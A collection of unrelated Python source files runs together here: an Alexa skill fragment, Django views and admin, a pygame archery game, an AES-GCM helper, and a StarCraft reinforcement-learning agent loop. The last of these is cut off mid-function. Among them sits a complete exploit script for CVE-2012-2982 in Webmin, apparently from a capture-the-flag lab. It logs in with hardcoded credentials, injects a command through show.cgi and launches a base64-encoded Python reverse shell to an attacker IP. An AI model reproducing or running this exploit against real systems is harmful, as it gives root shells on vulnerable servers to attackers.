service = intent["slots"]["Service"]["resolutions"]["resolutionsPerAuthority"][0]["values"][
0]["value"]["id"].lower()
except KeyError:
speech_output = speech.PLEASE_REPEAT_SERVICE
speechlet_response = utils.build_speechlet_response(output=speech_output,
reprompt_text=None,
should_end_session=False,
directives=[{
"type": "Dialog.ElicitSlot",
"slotToElicit": "Service"}])
return None, utils.build_response(speechlet_response)
return service, None
def ensure_date_is_not_in_the_future(date):
if not utils.is_not_in_future(date):
speech_output = speech.SERVICE_IS_IN_THE_FUTURE
speechlet_response = utils.build_speechlet_response(output=speech_output,
reprompt_text=None,
should_end_session=True)
return utils.build_response(speechlet_response)
return None
|
#!/usr/bin/env python
#CVE-2012-2982 translated from ruby metasploit module (/webmin_show_cgi_exec.rb)
#program outline:
# - POST request with compromised creds to get the cookie
# - exploit using invalid characters to get system shell
# - fetches system shell as root
# - sends shell through socket to listening attacker IP
#usage:
# - MUST BE SSH TUNNELED INTO MACHINE TO ACCESS localhost
# - python gamezone.py
# - listen with nc -nlvp 4445 on attacker
import sys, os, subprocess, requests, socket, string, secrets, base64
lhost = "10.10.174.47" #attacker IP CHANGE, needs to be a string to convert in payload function
lport = "4445" # listening port, string to convert in payload function
#Login with compromised creds and print good status response
creds = {'page' : "%2F", 'user' : "agent47", 'pass' : "videogamer124"} #must be A dictionary, list of tuples, bytes or a file object
url = "http://localhost:10000/session_login.cgi"
r = requests.post(url, data=creds, cookies={"testing":"1"}, verify=False, allow_redirects=False) #send POST request to login
#if status code 302 found and sid not empty
if r.status_code == 302 and r.cookies["sid"] != None:
print("[+] Login successful, executing payload (listen for shell)")
else:
print("[-] Failed to login")
sid = r.headers['Set-Cookie'].replace('\n', '').split('=')[1].split(";")[0].strip() #replace the sid cookie newline character, split at = and store the second element (sid) of array, split at ; and stop at first element in array, strip remaining
#generates random characters and delivers the payload
def rand():
alphaNum = string.ascii_letters + string.digits #custom alphanumeric string variable
randChar = ''.join(secrets.choice(alphaNum) for i in range(5)) #generate 5 random alphanumeric characters
return randChar
def payload():
payload = "python -c \"import base64;exec(base64.b64decode('" #run python command to execute base64
shell = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\""+ lhost + "\"," + lport + "));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"])" #open a socket, send it to the attacking host/port, open the shell
shell = str.encode(shell) #encode the shellcode as a string
encoded = base64.b64encode(shell) #encode the string with base64
encoded = encoded.decode("utf-8") #decode that to be used as a string in the exploit URL
closing = "'))\"" #close the payload
payload += encoded #update the payload to contain the encoded/decoded parameters
payload += closing
return payload
exp = "http://localhost:10000/file/show.cgi/bin/" + "%s|%s|" % (rand(), payload())
req = requests.post(exp, cookies={"sid":sid}, verify=False, allow_redirects=False) #send POST request to upload shellcode
|
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse
from django.http import Http404
from django.template import loader
from .models import File
from django.views.generic.edit import CreateView
from django.views import generic
# Create your views here.
def index(request):
all_files = File.objects.all()
# template = loader.get_template('music/index.html')
context = {
'all_files': all_files,
}
# return HttpResponse(template.render(context, request))
return render(request, 'uploadfile/index.html', context)
class FileFormCreate(CreateView):
model = File
fields = ['name','company','file_type','file_url', 'file_title'] |
import pygame
from pygame import mixer
import screeninfo
from screeninfo import get_monitors
pygame.init()
mixer.init()
white = (255, 255, 255)
black = (0, 0, 0)
red = (255, 0, 0)
for m in get_monitors():
screen_width = m.width
screen_height = m.height
block_width = 8
block_height = 130
arrow_width = 95
arrow_height = 5
display = pygame.display.set_mode((screen_width, screen_height),pygame.FULLSCREEN)
BG=pygame.image.load("background.png")
BG=pygame.transform.scale(BG,(screen_width, screen_height))
ar_img=pygame.image.load("bow.png")
ar_img=pygame.transform.scale(ar_img,(100, 100))
ar_img=pygame.transform.rotate(ar_img,-90)
ar_small=pygame.image.load("bow.png")
ar_small=pygame.transform.scale(ar_img,(40, 40))
ar_small=pygame.transform.rotate(ar_small,90)
BG_MUSIC=mixer.music.load("BG.mp3")
hit=pygame.mixer.Sound("hit.wav")
pygame.display.set_caption("ARCHERY MASTER 5000")
clock = pygame.time.Clock()
font = pygame.font.SysFont(None, 40)
def message_to_screen(msg, color,place):
screen_text = font.render(msg, True, color)
display.blit(screen_text, place)
def gameLoop():
BG_MUSIC = mixer.music.play(-1)
block_x = screen_width-30
block_y = 25
block_speed = 13
arrow_x = 1
arrow_y = screen_height//2
arrow_speed = 0
count=10
score=0
gameExit = False
while not gameExit:
for event in pygame.event.get():
if event.type == pygame.QUIT:
gameExit = True
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_SPACE and arrow_x==1:
count-=1
arrow_speed = 28
if event.key == pygame.K_q:
gameExit = True
display.blit(BG,(0,0))
display.blit(ar_img,(arrow_x, arrow_y))
if arrow_x> screen_width+300:
arrow_x=1
arrow_speed = 0
if (arrow_x+ar_img.get_width())in range(block_x-(3*block_width),block_x-(2*block_width)+4)and ((arrow_y) in range(rect3.top,rect3.bottom)):
pygame.mixer.Sound.play(hit)
arrow_x = 1
arrow_speed = 0
score+=30
elif (arrow_x+ar_img.get_width())in range(block_x-(2*block_width),block_x-block_width+4) and (arrow_y) in range(rect2.top,rect2.bottom):
pygame.mixer.Sound.play(hit)
arrow_x = 1
arrow_speed=0
score+=20
elif (arrow_x+ar_img.get_width())in range(block_x-block_width,block_x+4) and (arrow_y) in range(block_y,block_y+block_height+2):
pygame.mixer.Sound.play(hit)
arrow_x = 1
arrow_speed=0
score+=10
if block_y < 5 or block_y > screen_height - block_height + 5:
block_speed *= -1
block_y += block_speed
arrow_x+= arrow_speed
# position set - > debug
if count==-1 :
gameExit=True
message_to_screen("score:" +str(score), white,(30,30))
message_to_screen(str(count), white,(screen_width-150,30))
display.blit(ar_small,(screen_width-120,27))
message_to_screen("press q for exit", white,(30,screen_height-40))
message_to_screen("press space for fire", white,(screen_width-300,screen_height-40))
rect1=pygame.draw.rect(display, (255, 0, 0), [block_x, block_y, block_width, block_height])
rect2=pygame.draw.rect(display, (100, 10, 5), [block_x-block_width, block_y+30, block_width,
block_height-60])
rect3=pygame.draw.rect(display, (black), [block_x-(2*block_width), block_y+45, block_width, block_height-90])
display.blit(ar_img, (arrow_x, arrow_y))
pygame.display.update()
clock.tick(80)
pygame.quit()
quit()
gameLoop()
|
from gpiozero import MotionSensor
pir = MotionSensor(17)
if pir.wait_for_motion(4):
print("Motion detected!")
else:
print("no motion")
|
from deeds.jobs import import_data_async
from deeds.models import (
Data, Deed, DeedType, Gender, Origin, OriginType, Party, Person, Profession,
Role, Source
)
from django.contrib import admin, messages
from django_rq import job
from rq import get_current_job
class BaseALAdmin(admin.ModelAdmin):
list_display = ['title']
search_fields = ['title']
@admin.register(Data)
class DataAdmin(admin.ModelAdmin):
autocomplete_fields = ['deed_type', 'place']
list_display = ['title', 'deed_type', 'data']
list_filter = ['deed_type']
def save_model(self, request, obj, form, change):
super().save_model(request, obj, form, change)
import_data_async.delay(request.user, obj)
class PartyInline(admin.TabularInline):
model = Party
autocomplete_fields = ['deed', 'person', 'profession', 'role']
extra = 1
@admin.register(Deed)
class DeedAdmin(admin.ModelAdmin):
autocomplete_fields = ['deed_type', 'place', 'source']
date_hierarchy = 'date'
inlines = [PartyInline]
list_display = ['n', 'date', 'deed_type', 'place', 'source']
list_filter = ['deed_type', 'place']
search_fields = ['n', 'date', 'deed_type', 'place', 'source']
@admin.register(DeedType)
class DeedTypeAdmin(BaseALAdmin):
pass
@admin.register(Gender)
class GenderAdmin(BaseALAdmin):
pass
@admin.register(OriginType)
class OriginType(BaseALAdmin):
pass
class OriginInline(admin.TabularInline):
model = Origin
autocomplete_fields = ['origin_type', 'place']
extra = 1
@admin.register(Person)
class PersonAdmin(admin.ModelAdmin):
inlines = [OriginInline, PartyInline]
list_display = ['name', 'surname', 'gender',
'age', 'birth_year', 'get_origins']
list_display_links = list_display
list_filter = ['gender', 'age', 'surname']
search_fields = ['name', 'surname']
@admin.register(Origin)
class OriginAdmin(admin.ModelAdmin):
autocomplete_fields = ['person', 'place', 'origin_type']
date_hierarchy = 'date'
list_display = ['person', 'place', 'origin_type', 'date']
list_filter = ['origin_type', 'place']
@admin.register(Profession)
class ProfessionAdmin(BaseALAdmin):
pass
@admin.register(Role)
class RoleAdmin(BaseALAdmin):
pass
@admin.register(Source)
class SourceAdmin(admin.ModelAdmin):
list_display = ['classmark', 'microfilm']
search_fields = ['classmark', 'microfilm']
|
from Crypto.Random import get_random_bytes
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad,unpad
class AES_OBJECT:
BLOCK_SIZE_AES = 16 # AES: Bloque de 128 bits
def __init__(self, key, mode, IV):
"""Inicializa las variables locales"""
self.key = key
self.mode = mode
self.IV = IV
@staticmethod
def generarClave():
return get_random_bytes(AES_OBJECT.BLOCK_SIZE_AES)
@staticmethod
def generarIV():
return get_random_bytes(AES_OBJECT.BLOCK_SIZE_AES)
def cifrar(self, cadena):
"""Cifra el parámetro cadena (de tipo String) con una IV específica, y
devuelve el texto cifrado binario"""
return self.aes_factory().encrypt_and_digest(pad(cadena.encode("utf-8"), self.BLOCK_SIZE_AES))
def descifrar(self, cifrado, mac):
"""Descifra el parámetro cifrado (de tipo binario) con una IV específica, y
devuelve la cadena en claro de tipo String"""
return unpad(
self.aes_factory().decrypt_and_verify(cifrado, mac),
self.BLOCK_SIZE_AES
).decode("utf-8","ignore")
def aes_factory(self):
if self.mode == AES.MODE_ECB:
return AES.new(self.key, self.mode)
elif self.mode == AES.MODE_CBC:
return AES.new(self.key, self.mode, self.IV)
elif self.mode == AES.MODE_CTR:
return AES.new(self.key, self.mode, nonce=self.IV)
elif self.mode == AES.MODE_OFB or AES.MODE_CFB:
return AES.new(self.key, self.mode, self.IV)
elif self.mode == AES.MODE_GCM:
return AES.new(self.key, self.mode, nonce=self.IV, mac_len=self.BLOCK_SIZE_AES)
def crear_AESKey():
"""Devuelve un número aleatorio de 16 bytes - 128 bits"""
return AES_OBJECT.generarClave()
def crear_AESSource(key_16):
"""Crea un objeto aes junto con el nonce inicial para enviar datos. """
# INCLUIR CODIGO AQUI
nonce = AES_OBJECT.generarIV()
return AES_OBJECT(key_16, AES.MODE_GCM, nonce), nonce
def crear_AESDestination(key_16, nonce_16_ini):
"""Crea un objeto aes para recibir datos"""
# INCLUIR CODIGO AQUI
return AES_OBJECT(key_16, AES.MODE_GCM, nonce_16_ini)
def cifrarAES(aes_cifrado: AES_OBJECT, cadena):
"""Cifra el parametro cadena (de tipo String), y devuelve el texto cifrado binario
Y el mac"""
# INCLUIR CODIGO AQUI
return aes_cifrado.cifrar(cadena) # datos_cifrado, mac_cifrado
def descifrarAES(aes_descifrado: AES_OBJECT, datos, mac):
"""Descifra el parametro datos (de tipo binario), y devuelve la cadena en claro de
tipo String.
También comprueba si el mac es correcto"""
# INCLUIR CODIGO AQUI con un try...except -> return datos_claro o return false
try:
return aes_descifrado.descifrar(datos, mac)
except:
return False |
from __future__ import absolute_import, unicode_literals
from celery import shared_task
from django.core.mail import send_mail
@shared_task
def send_tmp_password(email, username, new_pwd):
send_mail(
"Worka Service Team",
f"안녕하세요 {username}님 :)\n\nWorka에서 임시 비밀번호를 발급해드렸습니다."
f"\n\n임시 비밀번호는 {new_pwd} 입니다. \n\n"
"로그인 후 비밀번호를 변경해주세요 :)",
"workaservice@gmail.com",
[email],
fail_silently=False,
)
return None
|
# Ask user: "What's my favorite food?"
# If user guesses my favorite food, output: "Yep! So amazing!"
# If not, output: "Yuck! That's not it!"
# End with "Thanks for playing!"
favoriteFood = "Enchiladas"
userGuess = input("What's my favorite food? ")
if userGuess == favoriteFood:
print("Yep! So amazing!")
else:
print("Yuck! That's not it!")
print("Thanks for playing!")
|
import copy
import pickle
import numpy as np
from . import Agent
from reaver.envs.base import Env, MultiProcEnv
class RunningAgent(Agent):
"""
Generic abstract class, defines API for interacting with an environment
"""
def __init__(self):
self.next_obs = None
self.start_step = 0
self.visualise = False
def run(self, env: Env, expt, event_buffer=None, n_steps=1000000):
env = self.wrap_env(env)
env.start()
try:
self._run(env, expt, event_buffer, n_steps)
except KeyboardInterrupt:
env.stop()
self.on_finish()
def _run(self, env, expt, event_buffer, n_steps):
self.on_start()
obs, *_ = env.reset()
obs = [o.copy() for o in obs]
# starting variables declaration
make_starting_variables(expt, event_buffer, obs)
# main running loop
for step in range(self.start_step, self.start_step + n_steps):
global previous_player_layers, previous_score_cumulative_layers, starting_values, episode_events
# choose action and predict value
action, value = self.get_action_and_value(obs)
# take action and observe effects
self.next_obs, reward, done = env.step(action)
# breakdown the obs into layers
screen_layers, minimap_layers, actions_layers, \
player_layers, score_cumulative_layers = extract_obs_layers(self.next_obs)
score_cumulative_layers = remake_score_cumulative(score_cumulative_layers, previous_score_cumulative_layers,
player_layers, previous_player_layers, done)
self.next_obs = remake_observations(screen_layers, minimap_layers, actions_layers,
player_layers, score_cumulative_layers)
previous_events = np.hstack((previous_player_layers, previous_score_cumulative_layers))
current_events = np.hstack((player_layers, score_cumulative_layers))
# episode_events = np.copy(previous_events)
#
if previous_player_layers is None and previous_score_cumulative_layers is None:
starting_values = np.copy(current_events)
# find event triggers based on non-spatial features
# Binary event triggers
# event_triggers = getTriggeredBinaryEvents(done, previous_events, current_events)
#
# # Quantitative event triggers
# event_triggers = getTriggeredQuantitativeEvents(done, previous_events, current_events)
#
# # Greedy event triggers
event_triggers = getTriggeredGreedyEvents(done, previous_events, current_events, starting_values)
#
# # calculate intrinsic reward from event_triggers and event_buffer
intrinsic_reward = calculate_intrinsic_reward(event_buffer, event_triggers, reward)
# # remember reward, intrinsic rewards and events
if previous_player_layers is not None and previous_score_cumulative_layers is not None:
# No RoE
# save_episode_events(previous_events, done)
# Binary RoE
# save_binary_episode_events(previous_events, current_events, done, event_triggers)
# Quantitative RoE
# save_quantitative_episode_events(previous_events, current_events, done, event_triggers)
# Greedy RoE
save_greedy_episode_events(previous_events, current_events, done, event_triggers, starting_values)
if done[0]:
record_final_events(step, expt, event_buffer)
self.on_step(step, obs, action, intrinsic_reward, game_reward=reward, done=done, value=value)
if done[0]:
previous_player_layers = None
previous_score_cumulative_layers = None
else:
previous_player_layers = np.copy(player_layers)
previous_score_cumulative_layers = np.copy(score_cumulative_layers)
obs = [o.copy() for o in self.next_obs]
env.stop()
self.on_finish()
def get_action_and_value(self, obs):
return self.get_action(obs), None
def on_start(self):
...
def on_step(self, step, obs, action, intrinsic_rew, game_reward, done, value=None):
...
def on_finish(self):
...
def wrap_env(self, env: Env) -> Env:
return env
class SyncRunningAgent(RunningAgent):
"""
Abstract class that handles synchronous multiprocessing via MultiProcEnv helper
Not meant to be used directly, extending classes automatically get the feature
"""
def __init__(self, n_envs):
RunningAgent.__init__(self)
self.n_envs = n_envs
def wrap_env(self, env: Env) -> Env:
render, env.render = env.render, False
envs = [env] + [copy.deepcopy(env) for _ in range(self.n_envs - 1)]
env.render = render
return MultiProcEnv(envs)
def make_starting_variables(expt, event_buffer, obs):
global event_number, envs, \
episode_intrinsic_rewards, episode_events, starting_broken_nsf, previous_broken_nsf, \
supply_blocked_idle_production_time, previous_player_layers, previous_score_cumulative_layers
global player_id, minerals, vespene, food_used, food_cap, food_army, food_workers, idle_worker_count, army_count, \
warp_gate_count, larva_count, \
score, idle_production_time, idle_worker_time, total_value_units, total_value_structures, \
killed_value_units, killed_value_structures, collected_minerals, collected_vespene, \
collection_rate_minerals, collection_rate_vespene, spent_minerals, spent_vespene
global starting_values
events_number = obs[-2].shape[1] + obs[-1].shape[1]
event_buffer.set_event_number(events_number)
event_number = event_buffer.get_events_number()
envs = len(obs[0])
# non_spatial_features_idx
# player non spatial features and indices
player_id = 0
minerals = 1
vespene = 2
food_used = 3
food_cap = 4
food_army = 5
food_workers = 6
idle_worker_count = 7
army_count = 8
warp_gate_count = 9
larva_count = 10
# score cumulative non spatial features and indices
score = 11
idle_production_time = 12
idle_worker_time = 13
total_value_units = 14
total_value_structures = 15
killed_value_units = 16
killed_value_structures = 17
collected_minerals = 18
collected_vespene = 19
collection_rate_minerals = 20
collection_rate_vespene = 21
spent_minerals = 22
spent_vespene = 23
# episode_rewards = np.zeros([1, envs])
episode_intrinsic_rewards = np.zeros([1, envs])
episode_events = np.zeros([envs, event_number])
starting_broken_nsf = np.zeros([envs, obs[-1].shape[1]])
previous_broken_nsf = None
supply_blocked_idle_production_time = np.zeros([envs])
# final_rewards = np.zeros([1, envs])
# final_intrinsic_rewards = np.zeros([1, envs])
# final_events = np.zeros([envs, event_number])
# event_triggers = None
with open(expt.event_log_txt, 'w') as outfile:
np.savetxt(outfile, np.arange(event_number).reshape(1, event_number), fmt="%10.0f", delimiter="|")
outfile.close()
previous_player_layers = None
previous_score_cumulative_layers = None
starting_values = None
def extract_obs_layers(obs):
screen_layers = np.copy(obs[0])
minimap_layers = np.copy(obs[1])
actions_layers = np.copy(obs[2])
player_layers = np.copy(obs[3])
score_cumulative_layers = np.copy(obs[4])
return screen_layers, minimap_layers, actions_layers, player_layers, score_cumulative_layers
def remake_observations(screen_layers, minimap_layers, actions_layers, player_layers, score_cumulative_layers):
obs_improved = [screen_layers, minimap_layers, actions_layers, player_layers, score_cumulative_layers]
return obs_improved
def calculate_intrinsic_reward(event_buffer, event_triggers, reward):
global episode_intrinsic_rewards
intrinsic_reward = []
for e in event_triggers:
intrinsic_reward.append(event_buffer.intrinsic_reward(e))
episode_intrinsic_rewards += intrinsic_reward
intrinsic_rew = np.array(reward, dtype=np.float64)
for i in range(len(reward)):
intrinsic_rew[i] = intrinsic_reward[i]
return intrinsic_rew
def remake_score_cumulative(current_score_cumulative_layers, previous_score_cumulative_layers,
current_player_layers, previous_player_layers,
done):
# nsf indices for the score cumulative layer
score = 0
idle_production_time = 1
idle_worker_time = 2
total_value_units = 3
total_value_structures = 4
killed_value_units = 5
killed_value_structures = 6
collected_minerals = 7
collected_vespene = 8
collection_rate_minerals = 9
collection_rate_vespene = 10
spent_minerals = 11
spent_vespene = 12
global supply_blocked_idle_production_time, previous_broken_nsf, starting_broken_nsf
remade_cumulative_layer = np.copy(current_score_cumulative_layers)
# increase idle production time if player is supply blocked
if previous_score_cumulative_layers is not None:
for i in range(len(done)):
if current_player_layers[i][food_cap] <= current_player_layers[i][food_workers] + \
current_player_layers[i][food_army] and \
remade_cumulative_layer[i][idle_production_time] == \
previous_score_cumulative_layers[i][idle_production_time] - \
supply_blocked_idle_production_time[i] and \
current_player_layers[i][food_cap] < 200:
supply_blocked_idle_production_time[i] += 1
remade_cumulative_layer[i][idle_production_time] += supply_blocked_idle_production_time[i]
# if it's the first step in the env than remember what it started with
if previous_score_cumulative_layers is None:
for i in range(len(done)):
if previous_broken_nsf is not None:
remade_cumulative_layer[i][idle_production_time] -= starting_broken_nsf[i][idle_production_time]
remade_cumulative_layer[i][idle_worker_time] -= starting_broken_nsf[i][idle_worker_time]
remade_cumulative_layer[i][total_value_units] -= starting_broken_nsf[i][total_value_units]
remade_cumulative_layer[i][total_value_structures] -= starting_broken_nsf[i][total_value_structures]
remade_cumulative_layer[i][spent_minerals] -= starting_broken_nsf[i][spent_minerals]
remade_cumulative_layer[i][spent_vespene] -= starting_broken_nsf[i][spent_vespene]
else:
starting_broken_nsf[i][idle_production_time] = remade_cumulative_layer[i][idle_production_time] - 1
starting_broken_nsf[i][idle_worker_time] = remade_cumulative_layer[i][idle_worker_time] - 12
starting_broken_nsf[i][total_value_units] = remade_cumulative_layer[i][total_value_units]
starting_broken_nsf[i][total_value_structures] = remade_cumulative_layer[i][total_value_structures]
starting_broken_nsf[i][spent_minerals] = remade_cumulative_layer[i][spent_minerals]
starting_broken_nsf[i][spent_vespene] = remade_cumulative_layer[i][spent_vespene]
elif previous_broken_nsf is not None and not done[0]:
for i in range(len(done)):
if remade_cumulative_layer[i][idle_production_time] >= starting_broken_nsf[i][idle_production_time]:
remade_cumulative_layer[i][idle_production_time] -= starting_broken_nsf[i][idle_production_time]
remade_cumulative_layer[i][idle_production_time] += supply_blocked_idle_production_time[i]
if remade_cumulative_layer[i][idle_worker_time] >= starting_broken_nsf[i][idle_worker_time]:
remade_cumulative_layer[i][idle_worker_time] -= starting_broken_nsf[i][idle_worker_time]
if remade_cumulative_layer[i][total_value_units] >= starting_broken_nsf[i][total_value_units]:
remade_cumulative_layer[i][total_value_units] -= starting_broken_nsf[i][total_value_units]
if remade_cumulative_layer[i][total_value_structures] >= starting_broken_nsf[i][total_value_structures]:
remade_cumulative_layer[i][total_value_structures] -= starting_broken_nsf[i][total_value_structures]
if remade_cumulative_layer[i][spent_minerals] >= starting_broken_nsf[i][spent_minerals]:
remade_cumulative_layer[i][spent_minerals] -= starting_broken_nsf[i][spent_minerals]
if remade_cumulative_layer[i][spent_vespene] >= starting_broken_nsf[i][spent_vespene]:
remade_cumulative_layer[i][spent_vespene] -= starting_broken_nsf[i][spent_vespene]
elif done[0]:
if previous_broken_nsf is not None:
starting_broken_nsf = np.copy(previous_broken_nsf)
for i in range(len(remade_cumulative_layer)):
previous_broken_nsf[i][idle_production_time] = remade_cumulative_layer[i][idle_production_time]
previous_broken_nsf[i][idle_worker_time] = remade_cumulative_layer[i][idle_worker_time]
previous_broken_nsf[i][total_value_units] = remade_cumulative_layer[i][total_value_units]
previous_broken_nsf[i][total_value_structures] = remade_cumulative_layer[i][total_value_structures]
previous_broken_nsf[i][spent_minerals] = remade_cumulative_layer[i][spent_minerals]
previous_broken_nsf[i][spent_vespene] = remade_cumulative_layer[i][spent_vespene]
else:
previous_broken_nsf = np.copy(starting_broken_nsf)
for i in range(len(remade_cumulative_layer)):
previous_broken_nsf[i][idle_production_time] = remade_cumulative_layer[i][idle_production_time] + \
supply_blocked_idle_production_time[i]
previous_broken_nsf[i][idle_worker_time] = remade_cumulative_layer[i][idle_worker_time]
previous_broken_nsf[i][total_value_units] = remade_cumulative_layer[i][total_value_units]
previous_broken_nsf[i][total_value_structures] = remade_cumulative_layer[i][total_value_structures]
previous_broken_nsf[i][spent_minerals] = remade_cumulative_layer[i][spent_minerals]
previous_broken_nsf[i][spent_vespene] = remade_cumulative_layer[i][spent_vespene]
for i in range(len(remade_cumulative_layer)):
if remade_cumulative_layer[i][idle_production_time] >= starting_broken_nsf[i][idle_production_time]:
remade_cumulative_layer[i][idle_production_time] -= starting_broken_nsf[i][idle_production_time]
remade_cumulative_layer[i][idle_production_time] += supply_blocked_idle_production_time[i]
if remade_cumulative_layer[i][idle_worker_time] >= starting_broken_nsf[i][idle_worker_time]:
remade_cumulative_layer[i][idle_worker_time] -= starting_broken_nsf[i][idle_worker_time]
if remade_cumulative_layer[i][spent_minerals] >= starting_broken_nsf[i][spent_minerals]:
remade_cumulative_layer[i][spent_minerals] -= starting_broken_nsf[i][spent_minerals]
if remade_cumulative_layer[i][spent_vespene] >= starting_broken_nsf[i][spent_vespene]:
remade_cumulative_layer[i][spent_vespene] -= starting_broken_nsf[i][spent_vespene]
if remade_cumulative_layer[i][total_value_units] >= starting_broken_nsf[i][total_value_units]:
remade_cumulative_layer[i][total_value_units] -= starting_broken_nsf[i][total_value_units]
if remade_cumulative_layer[i][total_value_structures] >= starting_broken_nsf[i][total_value_structures]:
remade_cumulative_layer[i][total_value_structures] -= starting_broken_nsf[i][total_value_structures]
starting_broken_nsf[i][idle_production_time] = remade_cumulative_layer[i][idle_production_time]
starting_broken_nsf[i][idle_worker_time] = remade_cumulative_layer[i][idle_worker_time]
# starting_broken_nsf[i][total_value_units] = remade_cumulative_layer[i][total_value_units]
# starting_broken_nsf[i][total_value_structures] = remade_cumulative_layer[i][total_value_structures]
starting_broken_nsf[i][spent_minerals] = remade_cumulative_layer[i][spent_minerals]
starting_broken_nsf[i][spent_vespene] = remade_cumulative_layer[i][spent_vespene]
if previous_broken_nsf is not None:
starting_broken_nsf[i][idle_production_time] = previous_broken_nsf[i][idle_production_time]
starting_broken_nsf[i][idle_worker_time] = previous_broken_nsf[i][idle_worker_time]
# starting_broken_nsf[i][total_value_units] = remade_cumulative_layer[i][total_value_units]
# starting_broken_nsf[i][total_value_structures] = remade_cumulative_layer[i][total_value_structures]
starting_broken_nsf[i][spent_minerals] = previous_broken_nsf[i][spent_minerals]
starting_broken_nsf[i][spent_vespene] = previous_broken_nsf[i][spent_vespene]
supply_blocked_idle_production_time = np.zeros(len(remade_cumulative_layer))
return remade_cumulative_layer
def save_episode_events(previous_events, done):
global episode_events
if previous_events is not None and not done[0]:
for env_no in range(len(previous_events)):
for nsf_idx in range(len(previous_events[0])):
episode_events[env_no][nsf_idx] = previous_events[env_no][nsf_idx]
def save_binary_episode_events(previous_events, current_events, done, event_triggers, staring_events=None):
global episode_events
episode_events += event_triggers
def save_quantitative_episode_events(previous_events, current_events, done, event_triggers):
global episode_events
# global idle_worker_count
# non_spatial_features_idx
# player non spatial features and indices
# player_id = 0
# minerals = 1
# vespene = 2
# food_used = 3
# food_cap = 4
# food_army = 5
# food_workers = 6
# idle_worker_count = 7
# army_count = 8
# warp_gate_count = 9
# larva_count = 10
# # score cumulative non spatial features and indices
# score = 11
# idle_production_time = 12
# idle_worker_time = 13
# total_value_units = 14
# total_value_structures = 15
# killed_value_units = 16
# killed_value_structures = 17
# collected_minerals = 18
# collected_vespene = 19
# collection_rate_minerals = 20
# collection_rate_vespene = 21
# spent_minerals = 22
# spent_vespene = 23
episode_events += event_triggers
if not done[0]:
for env_no in range(len(current_events)):
episode_events[env_no][idle_worker_count] = current_events[env_no][idle_worker_count]
episode_events[env_no][collection_rate_minerals] = current_events[env_no][collection_rate_minerals]
episode_events[env_no][collection_rate_vespene] = current_events[env_no][collection_rate_vespene]
for i in range(len(current_events[0])):
if episode_events[env_no][i] < 0:
episode_events[env_no][i] = 0
def save_greedy_episode_events(previous_events, current_events, done, event_triggers, staring_events=None):
global episode_events
# non_spatial_features_idx
# player non spatial features and indices
# player_id = 0
# minerals = 1
# vespene = 2
# food_used = 3
# food_cap = 4
# food_army = 5
# food_workers = 6
# idle_worker_count = 7
# army_count = 8
# warp_gate_count = 9
# larva_count = 10
# # score cumulative non spatial features and indices
# score = 11
# idle_production_time = 12
# idle_worker_time = 13
# total_value_units = 14
# total_value_structures = 15
# killed_value_units = 16
# killed_value_structures = 17
# collected_minerals = 18
# collected_vespene = 19
# collection_rate_minerals = 20
# collection_rate_vespene = 21
# spent_minerals = 22
# spent_vespene = 23
episode_events += event_triggers
# if previous_events is None:
# for env_no in range(len(current_events)):
# episode_events[env_no][minerals] += staring_events[env_no][minerals]
if previous_events is not None and not done[0]:
for env_no in range(len(previous_events)):
#
# episode_events[env_no][score] = current_events[env_no][score]
# episode_events[env_no][food_cap] = current_events[env_no][food_cap] - staring_events[env_no][food_cap]
# episode_events[env_no][food_army] = current_events[env_no][food_army] - staring_events[env_no][food_army]
# episode_events[env_no][food_workers] = current_events[env_no][food_workers] - staring_events[env_no][food_workers]
# episode_events[env_no][food_used] = current_events[env_no][food_used] - staring_events[env_no][food_used]
#
# episode_events[env_no][total_value_units] = current_events[env_no][total_value_units] - \
# staring_events[env_no][total_value_units]
#
# episode_events[env_no][total_value_structures] = current_events[env_no][total_value_structures] - \
# staring_events[env_no][total_value_structures]
#
# episode_events[env_no][collected_minerals] = current_events[env_no][collected_minerals]
# episode_events[env_no][collected_vespene] = current_events[env_no][collected_vespene]
# episode_events[env_no][collection_rate_minerals] = current_events[env_no][collection_rate_minerals]
# episode_events[env_no][collection_rate_vespene] = current_events[env_no][collection_rate_vespene]
episode_events[env_no][idle_worker_count] = current_events[env_no][idle_worker_count]
for event_idx in range(event_triggers.shape[1]):
if event_idx in [
# minerals, vespene, food_used,
food_cap, food_workers, food_army, army_count,
warp_gate_count, larva_count,
score, total_value_units, total_value_structures, killed_value_units, killed_value_structures,
collected_minerals, collected_vespene,
collection_rate_minerals, collection_rate_vespene,
# spent_minerals, spent_vespene
]:
episode_events[env_no][event_idx] = current_events[env_no][event_idx] - \
staring_events[env_no][event_idx]
for i in range(len(current_events[0])):
if episode_events[env_no][i] < 0:
episode_events[env_no][i] = 0
def record_final_events(step, expt, event_buffer):
global episode_events, episode_intrinsic_rewards, previous_broken_nsf, starting_broken_nsf
final_events = np.zeros([envs, event_number])
final_events += episode_events
episode_intrinsic_rewards = np.zeros([1, envs])
episode_events = np.zeros([envs, event_number])
for i in range(len(final_events)):
event_buffer.record_events(np.copy(final_events[i]), frame=step)
event_str = ""
for j in range(final_events.shape[0]):
for i in range(len(final_events[0])):
event_str += "{:2d}: {:5.0f} |".format(i, final_events[j][i])
event_str += "\n"
event_str += "\n"
with open(expt.event_log_txt, 'a') as outfile:
outfile.write(event_str)
outfile.close()
with open(expt.event_log_pkl, "wb") as f:
pickle.dump(event_buffer, f)
f.close()
def getTriggeredBinaryEvents(done, previous_events, current_events):
# non_spatial_features_idx
# player non spatial features and indices
player_id = 0
minerals = 1
vespene = 2
food_used = 3
food_cap = 4
food_army = 5
food_workers = 6
idle_worker_count = 7
army_count = 8
warp_gate_count = 9
larva_count = 10
# score cumulative non spatial features and indices
score = 11
idle_production_time = 12
idle_worker_time = 13
total_value_units = 14
total_value_structures = 15
killed_value_units = 16
killed_value_structures = 17
collected_minerals = 18
collected_vespene = 19
collection_rate_minerals = 20
collection_rate_vespene = 21
spent_minerals = 22
spent_vespene = 23
event_triggers = np.zeros([len(current_events), len(current_events[0])])
if previous_player_layers is None or previous_score_cumulative_layers is None or done[0]:
return event_triggers
for env_no in range(event_triggers.shape[0]):
for event_idx in range(event_triggers.shape[1]):
if event_idx in [
minerals, vespene, food_used, food_cap, food_workers, food_army, army_count,
warp_gate_count, larva_count,
